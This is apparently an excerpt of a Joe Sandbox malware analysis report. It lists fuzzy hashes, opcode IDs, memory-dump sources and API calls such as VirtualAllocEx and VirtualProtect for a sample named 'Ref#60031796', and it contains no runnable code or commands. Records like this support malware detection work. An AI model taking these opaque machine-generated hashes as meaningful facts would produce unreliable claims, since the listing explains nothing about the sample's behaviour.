                                                                                                            • Instruction ID: 92ed23ea7f15784f251cba328e522f315f07cbd1871ec3f5bbb7494bd90b3966
                                                                                                            • Opcode Fuzzy Hash: dc75d541ebc23f05be830c968aafc75edbbc450b37a27fe51a100589b9dccda6
                                                                                                            • Instruction Fuzzy Hash: 952104B19003499FDB10DFAAC845ADFFBF9AF88214F14842AE519A7250CB799544CBA1
                                                                                                            APIs
                                                                                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0714A8E4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2367400518.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7140000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ProtectVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 544645111-0
                                                                                                            • Opcode ID: d9dd2418909c56c28bee05c1358a0b2c31faa403c0937587b7fd71d1b53f0e9f
                                                                                                            • Instruction ID: 472fac5c3acb0d04fe618d44a64888d2dda3c63fef54943212e2122ec87e10e9
                                                                                                            • Opcode Fuzzy Hash: d9dd2418909c56c28bee05c1358a0b2c31faa403c0937587b7fd71d1b53f0e9f
                                                                                                            • Instruction Fuzzy Hash: CB2115B180034A9FDB10DFAAC541BAEFBF4EF88320F148429D519A7240CB789545CFA5
                                                                                                            APIs
                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0682FA86
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2360678028.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6820000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: 0ab5153e4f03b47f9496e96539e912574fbb2ee6cc54e5635ff2ece49fe00a0c
                                                                                                            • Instruction ID: 4ccc59b60acc0c7c965723b478553215f8f610a240485f896a793384d0709c02
                                                                                                            • Opcode Fuzzy Hash: 0ab5153e4f03b47f9496e96539e912574fbb2ee6cc54e5635ff2ece49fe00a0c
                                                                                                            • Instruction Fuzzy Hash: 71115671800349DFDB10DFAAD845BEFBBF9AF88320F148419E619A7250CB75A940CFA5
                                                                                                            APIs
                                                                                                            • VirtualProtect.KERNEL32(?,?,?,?), ref: 06F70EB4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362950294.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6f70000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ProtectVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 544645111-0
                                                                                                            • Opcode ID: 82c4da1a607aa07d19403ed3d33256d497d14d22c5bc88aca9cf155677c754b7
                                                                                                            • Instruction ID: 6421b293ed86778e4289cd66d6aab4ab87820ad8379553378fe483d4114d7f54
                                                                                                            • Opcode Fuzzy Hash: 82c4da1a607aa07d19403ed3d33256d497d14d22c5bc88aca9cf155677c754b7
                                                                                                            • Instruction Fuzzy Hash: F011F4B1D003499FDB10DFAAC885AAFFBF4AF88310F14842AD519A7250CB799944CFA5
                                                                                                            APIs
                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0682FA86
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2360678028.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6820000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: 63d1430f333794a24a5427033bffb7c7ce27b4633ef9c91d11c1f31de78c6e88
                                                                                                            • Instruction ID: 09b1fcf21009274e058382c7f1124a5205566457438597409580607eb0edcfde
                                                                                                            • Opcode Fuzzy Hash: 63d1430f333794a24a5427033bffb7c7ce27b4633ef9c91d11c1f31de78c6e88
                                                                                                            • Instruction Fuzzy Hash: 92115671800349DFDB10DFAAC845BDEBBF5AF88310F148419E619A7250C775A940CBA0
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0125C99E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2346286188.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_1250000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleModule
                                                                                                            • String ID:
                                                                                                            • API String ID: 4139908857-0
                                                                                                            • Opcode ID: 921f8fc1de0a44924848e6e4d4b3dce2c73f32778ae37ae2bc266a33b4a93416
                                                                                                            • Instruction ID: 970913c372262cf24c4b1632c646e5b2c92850aa6e72684c242d4782a2d4b6ff
                                                                                                            • Opcode Fuzzy Hash: 921f8fc1de0a44924848e6e4d4b3dce2c73f32778ae37ae2bc266a33b4a93416
                                                                                                            • Instruction Fuzzy Hash: 701110B5C00749CFDB10CF9AC444AEEFBF8EB88224F10842AD969A7210D379A545CFA1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362810753.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6f40000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: A
                                                                                                            • API String ID: 0-3554254475
                                                                                                            • Opcode ID: f57f6d17a62b5da5ebbeb9c9fcaad1a102af1943c7c3a4ad2fbacb2c5928b606
                                                                                                            • Instruction ID: afc72d037e91fbe58491f8721fe2e8238c20dfdf8566a9b1ee24dbe8468ddd0f
                                                                                                            • Opcode Fuzzy Hash: f57f6d17a62b5da5ebbeb9c9fcaad1a102af1943c7c3a4ad2fbacb2c5928b606
                                                                                                            • Instruction Fuzzy Hash: 2541AF74E002699FDB60DF54C958AD8BBB1BF49305F0084EAE949A3690DBB45EC1CF51
                                                                                                            APIs
                                                                                                            • VirtualAlloc.KERNEL32(?,?,?,?), ref: 06F71E93
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362950294.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6f70000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: 5c05a6f636bb2c1c48ed2e37c982d1051c01da56790cbd5ae7669ea94c1a4296
                                                                                                            • Instruction ID: fe26a5eeae90c3c9297ca78ac561df9aafca46f578cbfe404130f36974543b60
                                                                                                            • Opcode Fuzzy Hash: 5c05a6f636bb2c1c48ed2e37c982d1051c01da56790cbd5ae7669ea94c1a4296
                                                                                                            • Instruction Fuzzy Hash: 0C1156719002499FEB20DFAAC845BEFBBF5EF88310F14881AE519A7200C775A544CBA0
                                                                                                            APIs
                                                                                                            • VirtualAlloc.KERNEL32(?,?,?,?), ref: 06F71E93
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362950294.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6f70000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: 611881cb062c296304e7721df5cd9d4ab757170f614beada72c2e92e4a7dbb71
                                                                                                            • Instruction ID: cc3ebfc3b35e82bddf53d97d97b5d27820d34426dec095b893b760f795c0881a
                                                                                                            • Opcode Fuzzy Hash: 611881cb062c296304e7721df5cd9d4ab757170f614beada72c2e92e4a7dbb71
                                                                                                            • Instruction Fuzzy Hash: A01134719003499FDB10DFAAC845BEFBBF9AF88320F14881AD519A7250CB79A544CBA5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362810753.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6f40000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: "
                                                                                                            • API String ID: 0-123907689
                                                                                                            • Opcode ID: 92710660b11aa14929e5085aa6b1b22dd19df2923563b41e319ec9bfe2bb6c25
                                                                                                            • Instruction ID: dea98025db673e9e0f8d0fd0470b28a55ebe8956b6f4586baa0280e3ae1753e9
                                                                                                            • Opcode Fuzzy Hash: 92710660b11aa14929e5085aa6b1b22dd19df2923563b41e319ec9bfe2bb6c25
                                                                                                            • Instruction Fuzzy Hash: 0C117F74D15229DFEB60DF65D948798BBB1BF48301F0085EAA40AA2692EB751AC4CF50
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2366998808.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7070000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: )
                                                                                                            • API String ID: 0-2427484129
                                                                                                            • Opcode ID: f395f085e510cb8138631469b8d275a9113db488fb7653e7429ef4d6d1989bcc
                                                                                                            • Instruction ID: 8be05f06470c0e7f1c579a158db5000a88a5d32eb3fa6600b1a303b40264debb
                                                                                                            • Opcode Fuzzy Hash: f395f085e510cb8138631469b8d275a9113db488fb7653e7429ef4d6d1989bcc
                                                                                                            • Instruction Fuzzy Hash: 8CF05AB0E26268CFEB65DF64D844BDEB6B5BB0A344F0046EAD509A3280D7B45A80CF45
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2366998808.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7070000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: k
                                                                                                            • API String ID: 0-140662621
                                                                                                            • Opcode ID: 427ee13b8b676688ffb9c7322fee0ac9a568443fb1051b17d3b01515f9a5dc0b
                                                                                                            • Instruction ID: 4f15bb50ca1da88d5be6ea7aef337bf06ff4048a75ded6285967e3e4b037a294
                                                                                                            • Opcode Fuzzy Hash: 427ee13b8b676688ffb9c7322fee0ac9a568443fb1051b17d3b01515f9a5dc0b
                                                                                                            • Instruction Fuzzy Hash: 4FD05EB4A25789CFDB18DF74E9842DE3B79FB49204F001559900A97248EF702E858F98
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2366998808.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7070000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: k
                                                                                                            • API String ID: 0-140662621
                                                                                                            • Opcode ID: 21aeaf38f9448449f4635882440b528faed0ee883203aed974a934db749b5e97
                                                                                                            • Instruction ID: 4f15bb50ca1da88d5be6ea7aef337bf06ff4048a75ded6285967e3e4b037a294
                                                                                                            • Opcode Fuzzy Hash: 21aeaf38f9448449f4635882440b528faed0ee883203aed974a934db749b5e97
                                                                                                            • Instruction Fuzzy Hash: 4FD05EB4A25789CFDB18DF74E9842DE3B79FB49204F001559900A97248EF702E858F98
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2366998808.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7070000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: ?
                                                                                                            • API String ID: 0-1684325040
                                                                                                            • Opcode ID: 411073d6117170c7f793d8da2882345200e10b8b4a334cc494845d957ded80a3
                                                                                                            • Instruction ID: 5ebae849bde55b665c29848c57ab65dc7ccc879aad606fc6c30c7018a4f9c4c9
                                                                                                            • Opcode Fuzzy Hash: 411073d6117170c7f793d8da2882345200e10b8b4a334cc494845d957ded80a3
                                                                                                            • Instruction Fuzzy Hash: 6FE042B4E112698FCB66CF60C890AADBBB6BF49204F5052DAEA1962340D7315B85CF48
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2366827807.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6fd0000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: db8f0d4eed75a57b2cd7aeceb429e5fac65466ad2ef4873ca72dcdfbfbb35ffa
                                                                                                            • Instruction ID: db577f295f8ebccd9550823cc569eb063ae3162b3dce43b16b4cd3e9d06d0082
                                                                                                            • Opcode Fuzzy Hash: db8f0d4eed75a57b2cd7aeceb429e5fac65466ad2ef4873ca72dcdfbfbb35ffa
                                                                                                            • Instruction Fuzzy Hash: 8D520875E002288FDB64DF68C955BADBBF2BF89300F1541D9E509A7391DA30AE81CF61
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2366827807.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6fd0000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 258293d642d8eee73efea5b2ff44daf4a96894347841482c33e2c2621826babc
                                                                                                            • Instruction ID: 17c34a2ca60abce04d963f54e8b4bd345eea35a01d90e1db1bd29c591618c20e
                                                                                                            • Opcode Fuzzy Hash: 258293d642d8eee73efea5b2ff44daf4a96894347841482c33e2c2621826babc
                                                                                                            • Instruction Fuzzy Hash: 6B226C35A002189FDB44DFA9C890A6DB7F6FF88310F198169E905AB3A5DB71ED41CB90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2366827807.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6fd0000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d23fa976e6f067344368f8a31dc3cac0dff540fe1e88cdc7692ce0d6956f9681
                                                                                                            • Instruction ID: d937cc70b38eb612f5dedd38ea09927af05f3bf701d5b3fc54a01ec690828028
                                                                                                            • Opcode Fuzzy Hash: d23fa976e6f067344368f8a31dc3cac0dff540fe1e88cdc7692ce0d6956f9681
                                                                                                            • Instruction Fuzzy Hash: 25228E32E00229CFCB51DFA5D854AAEBBB3BF49300F188156EA11A7394DB34AD46CF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2366827807.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6fd0000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 75f1ec5c92c41bd892f78368edad9e483ac5149ef7a93df294372b96677a67eb
                                                                                                            • Instruction ID: fa2518c4bb9f4217306ed1af9c78b31372c19690744202dc47dc394b472a2cd6
                                                                                                            • Opcode Fuzzy Hash: 75f1ec5c92c41bd892f78368edad9e483ac5149ef7a93df294372b96677a67eb
                                                                                                            • Instruction Fuzzy Hash: 62126D31A00608DFDB65EFA9C884A6EB7F3FF85300F248969D506AB395DB31AC45CB51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2366827807.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6fd0000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0a2a9c116f13925ca09c975430a7abdc254f2ddfb755f06ed0a3685994a7581d
                                                                                                            • Instruction ID: ff639f6530707572564a623036fb6e713c2a170ac9312b0f185b76df73c7d033
                                                                                                            • Opcode Fuzzy Hash: 0a2a9c116f13925ca09c975430a7abdc254f2ddfb755f06ed0a3685994a7581d
                                                                                                            • Instruction Fuzzy Hash: FE12E834A002198FCB54EF64CC94A9DB7B2FF89300F5586A8D54AAB395DB70ED85CF90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2366827807.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6fd0000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0b4a92ce5e4515ea4eb02e0a48d708096b2af57bb85274db68ba838bb275f3ed
                                                                                                            • Instruction ID: 6324085d6262be25de31c101e17c696565f9b464e483f98b5f7ab7fe1ef7df37
                                                                                                            • Opcode Fuzzy Hash: 0b4a92ce5e4515ea4eb02e0a48d708096b2af57bb85274db68ba838bb275f3ed
                                                                                                            • Instruction Fuzzy Hash: 18F1FA34A00218CFCB44DFA4D998E9DB7B2FF89301F558159E816AB3A5DB75EC42CB81
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2366827807.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6fd0000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 01bf9a3a62f50cf69cebe7a96c27ab9177d066d16220205b0df7f8130e482df4
                                                                                                            • Instruction ID: 3999eed68dfd1baa435718bbb6273edcaaff3f4ea2ce468957ad5ec8230fe11e
                                                                                                            • Opcode Fuzzy Hash: 01bf9a3a62f50cf69cebe7a96c27ab9177d066d16220205b0df7f8130e482df4
                                                                                                            • Instruction Fuzzy Hash: 21E14234A00209DFCB44EFA4D89499DBBB2FF89310F148569E416AB3A4DB34FD46CB91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2366704895.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6fb0000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 72a1e9ff575f512a1c9040249d708dffc867231fbe4f01ed5a7c41227a121c5d
                                                                                                            • Instruction ID: 5c12c734e0ee979f40d121b7712e84bc639bcc11729e8a08cb1aa6da35907463
                                                                                                            • Opcode Fuzzy Hash: 72a1e9ff575f512a1c9040249d708dffc867231fbe4f01ed5a7c41227a121c5d
                                                                                                            • Instruction Fuzzy Hash: D0F1D274D01218DFDB68DFA5E498AECBBB2FF49312F205429E40AA7390DB355A85CF41
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2366827807.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6fd0000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f9cd0af319292a10b4b867cb4167b7cae7abf70c2d651ee54ae684b8a18c63d6
                                                                                                            • Instruction ID: 6331556689de6a4c9ebf86de77587557eedfc79c16a4d203817fe5ac6757a424
                                                                                                            • Opcode Fuzzy Hash: f9cd0af319292a10b4b867cb4167b7cae7abf70c2d651ee54ae684b8a18c63d6
                                                                                                            • Instruction Fuzzy Hash: E8D1C0F1B0420A8FE7559F69C45A73EBAE3AF84300F194969E682DB3D1DA34ED40C752
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2366998808.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7070000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2f12847a0aef656630e942a15281418f568785d9a805cda1f4e599885dbafa01
                                                                                                            • Instruction ID: 1ea8b6a7bf89c47111ea3867fb58299ab913afb308d37a2783fdd8e39ac62023
                                                                                                            • Opcode Fuzzy Hash: 2f12847a0aef656630e942a15281418f568785d9a805cda1f4e599885dbafa01
                                                                                                            • Instruction Fuzzy Hash: C6B134B4E04299CFEB54DFA8C584AADFBF1BF4A300F54822AE426A7240CB345942DF55
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362810753.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6f40000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: fadb6be2e5bf12cf96c3f1a4cf9fed584b7a182e012637bfe7ca7664123a42ed
                                                                                                            • Instruction ID: 496bcc0712c309f0cde7b99ad59b3cd1f32dafdece40bff95b7dd88f73421b7c
                                                                                                            • Opcode Fuzzy Hash: fadb6be2e5bf12cf96c3f1a4cf9fed584b7a182e012637bfe7ca7664123a42ed
                                                                                                            • Instruction Fuzzy Hash: 41D1A074D01228CFEBA6EF24C959B99BBB9BB49301F1090EAE50DA7640DB745BC1CF40
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2366827807.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6fd0000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 487a4bc199ae6f8899b65e44975f5b0ca4caa6baea2d6ad9cfaa955619d4f959
                                                                                                            • Instruction ID: dfeacfb689a34e641d81cb7ae892a9b2bc5210c897d73581c506ee3dc83f33cf
                                                                                                            • Opcode Fuzzy Hash: 487a4bc199ae6f8899b65e44975f5b0ca4caa6baea2d6ad9cfaa955619d4f959
                                                                                                            • Instruction Fuzzy Hash: 20918035B012189FCB45DFA9E954AADBBB3FF89311F1480A9E9119B390CB71ED41CB50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2366704895.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6fb0000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2cb3f557e1c9f93877a5ff6d03f65bb5cd99b4867d44a13c1f818616a76181ba
                                                                                                            • Instruction ID: a48e20bf01dd154155e99dc474ba481c083f8b52fd94014e09fd51decdb248f7
                                                                                                            • Opcode Fuzzy Hash: 2cb3f557e1c9f93877a5ff6d03f65bb5cd99b4867d44a13c1f818616a76181ba
                                                                                                            • Instruction Fuzzy Hash: 49A1E034E00219DFDB58DBA6D0886FDBBB2FF89301F109029E916B7294CB345A82CF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2366827807.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6fd0000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1a15ef9e99a2a73ff56e194b2e1f2e2a904a9b196f402126c40ab81adc2f1842
                                                                                                            • Instruction ID: e8bee6ac160c3fdbf128e240fd6091140b174206f005585017d19cc2ace72259
                                                                                                            • Opcode Fuzzy Hash: 1a15ef9e99a2a73ff56e194b2e1f2e2a904a9b196f402126c40ab81adc2f1842
                                                                                                            • Instruction Fuzzy Hash: BFA10A34A10218CFCB44EFA4D898E9DB7B2FF89300F558159E815AB3A5DB74AC46CB91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2366827807.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6fd0000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5deab38a8a46f607f857c812cc54e5a1b9f05e0da39d92d9e438ea0225aaf245
                                                                                                            • Instruction ID: 3dc8e36a6565d4cc68f54652f4ca6829f9ee9b52317c833de1ace2dd22fff9fe
                                                                                                            • Opcode Fuzzy Hash: 5deab38a8a46f607f857c812cc54e5a1b9f05e0da39d92d9e438ea0225aaf245
                                                                                                            • Instruction Fuzzy Hash: E6814B30B10214DFDB45DF68D898AADB7B6AF89710F1841A9E406DF3A1CB34EC41CB90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2366827807.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6fd0000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c61c54f3e85e328799898b664de93133820508a68e0bba24592d5b2263ef744a
                                                                                                            • Instruction ID: e51fe723ecaac5e7f3bf9babe5b0a06c60215a966076530d582be07eb12b862f
                                                                                                            • Opcode Fuzzy Hash: c61c54f3e85e328799898b664de93133820508a68e0bba24592d5b2263ef744a
                                                                                                            • Instruction Fuzzy Hash: D8810435A00618CFCB54DF68C484A9EB7F6FF89350B1981A9E9169B364DB30FD42CB90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2366827807.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6fd0000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e2266ef704377f9733c034cf1af6496d3bd785f7e6871f95c954ea8ea261b9c6
                                                                                                            • Instruction ID: f8e99ab772a7050d277dba286b39e97cb411960da387bbe22560135fbd6f4c26
                                                                                                            • Opcode Fuzzy Hash: e2266ef704377f9733c034cf1af6496d3bd785f7e6871f95c954ea8ea261b9c6
                                                                                                            • Instruction Fuzzy Hash: 56714C35B00218DFDB44EBA4C864BAE77F7AF88700F148569E506AB395CB75AC42CB91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2366827807.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6fd0000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 08ff7c3394116e51f93433541c7033e03454dff2ecb780da86c1d49056072da8
                                                                                                            • Instruction ID: 131ef04b19df22045ea95e85ffaac1dc54015ae504cb4744ff19bec27f1fba59
                                                                                                            • Opcode Fuzzy Hash: 08ff7c3394116e51f93433541c7033e03454dff2ecb780da86c1d49056072da8
